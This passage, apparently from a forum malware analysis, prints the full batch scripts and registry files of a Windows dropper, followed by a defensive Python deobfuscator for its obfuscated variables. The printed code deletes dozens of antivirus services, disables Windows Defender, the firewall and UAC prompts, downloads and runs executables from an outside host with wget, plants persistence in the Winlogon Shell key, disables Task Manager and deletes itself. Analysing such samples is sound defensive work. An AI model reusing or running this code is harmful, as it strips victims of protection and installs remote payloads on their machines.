Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MsMpSvc" /f
Reg Add "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /v "Start" /t REG_DWORD /d "4" /f
bcdedit /deletevalue "{current}" safeboot
reg add "HKLM\SYSTEM\CurrentControlset\Control\Nls\Language" /v "Default" /t REG_SZ /d "0409" /f
regedit /s %windir%\usw.reg
regedit /s %windir%\d.reg
set /a tz=(%random%%%4)+1
if %tz% == 1 regedit /s %windir%\at.reg
if %tz% == 2 regedit /s %windir%\ct.reg
if %tz% == 3 regedit /s %windir%\et.reg
if %tz% == 4 regedit /s %windir%\mt.reg
del %windir%\Set-up.exe
del %windir%\at.reg
del %windir%\ct.reg
del %windir%\et.reg
del %windir%\mt.reg
del %windir%\c.exe
del %windir%\usw.reg
del %windir%\d.reg
del %windir%\b.bat
shutdown /r /f /t 10
del %0
::
::
```

Code:
```
@echo off
set "url=http://db.softfire.info/rs/st"
::
::
set "osX=%PROCESSOR_ARCHITECTURE%"
if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64"
if "%osX%"=="x86" (set "bits=32") else set "bits=64"
regedit /s %windir%\mgr_f.reg
timeout /t 30
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/fr.exe"
if exist "%windir%\fr.exe" (
goto start_fr
) else (
timeout /t 120
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/fr.exe"
if not exist "%windir%\fr.exe" exit
goto start_fr
)
:e
timeout /t 60
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/e.exe"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/e.bat"
if exist "%windir%\e.bat" (
start %windir%\e.exe
) else (
timeout /t 120
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/e.exe"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/e.bat"
if not exist "%windir%\e.bat" exit
start %windir%\e.exe
)
Reg query "HKLM\SOFTWARE\Microsoft\flcact" /v "ActivateID" /reg:%bits%
if %ERRORLEVEL% EQU 0 (
regedit /s %windir%\e.reg
del %windir%\e.reg
del %windir%\fr.exe
del %windir%\d.exe
del %windir%\s.txt
del %0
) else (
regedit /s %windir%\mgr_n.reg
exit
)
:start_fr
Reg query "HKLM\SOFTWARE\Microsoft\flcact" /v "ActivateID" /reg:%bits%
if %ERRORLEVEL% EQU 1 start %windir%\fr.exe
goto e
::
```

Code:
```
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000000
"ConsentPromptBehaviorAdmin"=dword:00000000
"PromptOnSecureDesktop"=dword:00000000
"ConsentPromptBehaviorUser"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinDefend]
"Start"=dword:00000005

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\SharedAccess]
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MpsSvc]
"Start"=dword:00000004
```

Code:
```
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation]
"Bias"=dword:000000f0
"DaylightBias"=dword:00000000
"DaylightName"="@tzres.dll,-82"
"DaylightStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"StandardBias"=dword:00000000
"StandardName"="@tzres.dll,-82"
"StandardStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"TimeZoneKeyName"="Atlantic Standard Time"
"DynamicDaylightTimeDisabled"=dword:00000001
"ActiveTimeBias"=dword:000000f0
```

Code:
```
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation]
"Bias"=dword:00000168
"DaylightBias"=dword:00000000
"DaylightName"="@tzres.dll,-151"
"DaylightStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"StandardBias"=dword:00000000
"StandardName"="@tzres.dll,-152"
"StandardStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"TimeZoneKeyName"="Central America Standard Time"
"DynamicDaylightTimeDisabled"=dword:00000000
"ActiveTimeBias"=dword:00000168
```

Code:
```
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation]
"Bias"=dword:0000012c
"DaylightBias"=dword:00000000
"DaylightName"="@tzres.dll,-112"
"DaylightStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"StandardBias"=dword:00000000
"StandardName"="@tzres.dll,-112"
"StandardStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"TimeZoneKeyName"="Eastern Standard Time"
"DynamicDaylightTimeDisabled"=dword:00000001
"ActiveTimeBias"=dword:0000012c
```

Code:
```
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation]
"Bias"=dword:000001a4
"DaylightBias"=dword:00000000
"DaylightName"="@tzres.dll,-192"
"DaylightStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"StandardBias"=dword:00000000
"StandardName"="@tzres.dll,-192"
"StandardStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"TimeZoneKeyName"="Mountain Standard Time"
"DynamicDaylightTimeDisabled"=dword:00000001
"ActiveTimeBias"=dword:000001a4
```

Code:
```
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
```

Code:
```
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000000
```

Code:
```
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe,c.exe"
```

Code:
```
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe,d.exe"
```

Code:
```
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe,e.exe"
```

A look inside the exe files. These files were not run, and they were not dissected either, for lack of the necessary resources and tools. Screenshots are in the spoiler.
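As an added example (not from the post above and not one of the dropper's own files), a small Python deobfuscator for the `s%j%%a3%`-style variable substitution used in a.bat and b.bat: it records each `set "x=y"` fragment in order and expands `%x%` references line by line, leaving runtime variables such as `%windir%`, `%0` and `%%i` untouched, the way the hand-deobfuscated listings above do. The sample script, the example.invalid URL and the indicator keyword list are constructed for this demonstration.

```python
"""Resolve the cmd-style variable substitution used by a.bat and b.bat.

The dropper defines fragments with `set "x=y"` and spells out every command
as a chain of %x% references (so `s%j%%a3%` is just `set`). Expanding each
line with the variables defined so far reproduces the readable script.
Expansion is static: values assigned inside `if` or `for` are not tracked.
"""
import re

# Quoted form set "name=value" and bare form set name=value (no /a, /p).
_SET_QUOTED = re.compile(r'^\s*set\s+"([^"=]+)=(.*)"\s*$', re.IGNORECASE)
_SET_BARE = re.compile(r'^\s*set\s+([^\s"=/][^\s"=]*)=(.*)$', re.IGNORECASE)

# Behaviours the analysis above calls out; a constructed triage keyword list.
INDICATORS = ("http://", "wget", "curl", "bcdedit", "reg delete",
              "regedit /s", "winlogon", "del %0")


def expand_line(line, env):
    """One left-to-right pass over a line, like cmd.exe's %var% phase.

    Names present in `env` are substituted; `%%` is kept so FOR variables
    such as %%i survive; an unknown %name% (e.g. %windir%) stays literal.
    """
    out, i, n = [], 0, len(line)
    while i < n:
        if line[i] != "%":
            out.append(line[i])
            i += 1
            continue
        if i + 1 < n and line[i + 1] == "%":
            out.append("%%")
            i += 2
            continue
        close = line.find("%", i + 1)
        name = line[i + 1:close] if close != -1 else ""
        if not name or re.search(r"\s", name):   # lone % or %0-style argument
            out.append("%")
            i += 1
            continue
        out.append(env.get(name.lower(), "%" + name + "%"))
        i = close + 1
    return "".join(out)


def record_set(line, env):
    """If an already expanded line is a plain `set`, store its variable."""
    m = _SET_QUOTED.match(line) or _SET_BARE.match(line)
    if not m:
        return False
    env[m.group(1).strip().lower()] = m.group(2)
    return True


def deobfuscate(script):
    """Return (readable lines, resolved variable table) for a batch script."""
    env, lines = {}, []
    for raw in script.splitlines():
        expanded = expand_line(raw, env)
        record_set(expanded, env)
        lines.append(expanded)
    return lines, env


def flag_suspicious(lines):
    """1-based line numbers and text of deobfuscated lines worth a look."""
    return [(num, text) for num, text in enumerate(lines, 1)
            if any(k in text.lower() for k in INDICATORS)]


# Constructed sample in the dropper's style (not the real a.bat; the URL is
# a placeholder). Raw string so the backslashes stay as typed.
SAMPLE = r'''@echo off
set "a3=t"
set "j=e"
set "xj66=s"
s%j%%a3% "zx3=""
s%j%%a3% "a5=."
s%j%%a3% "a2=p"
s%j%%a3% "n3=i"
s%j%%a3% "f=x"
s%j%%a3% "a1=h"
s%j%%a3% "a6=:"
s%j%%a3% "a4=/"
s%j%%a3% "hy=\"
s%j%%a3% "pi=r"
s%j%%a3% "gt12=a"
s%j%%a3% "aa2=l"
s%j%%a3% "g1=%windir%"
s%j%%a3% "r8=no%pi%m%gt12%%aa2%"
s%j%%a3% "s5=%xj66%%a3%ar%a3%"
s%j%%a3% "l=%a1%%a3%%a3%%a2%%a6%%a4%%a4%example.invalid/rs/st"
::
%s5% %a4%%r8% %g1%%hy%S%j%%a3%-u%a2%%a5%%j%%f%%j%
%g1%%hy%wg%j%%a3%%a5%%j%%f%%j% -c -P %zx3%%g1%%zx3% %zx3%%l%%a4%b%a5%bat%zx3%
%n3%f %j%%f%%n3%s%a3% %zx3%%g1%%hy%y%a5%t%f%t%zx3% d%j%l %0
'''

if __name__ == "__main__":
    readable, table = deobfuscate(SAMPLE)
    print("\n".join(readable))
    for num, text in flag_suspicious(readable):
        print(f"line {num}: {text}")
```

Feeding the real a.bat or b.bat listing (one command per line) to `deobfuscate` yields the same readable form the post shows, and `flag_suspicious` narrows a long script to the download, registry and self-deletion lines.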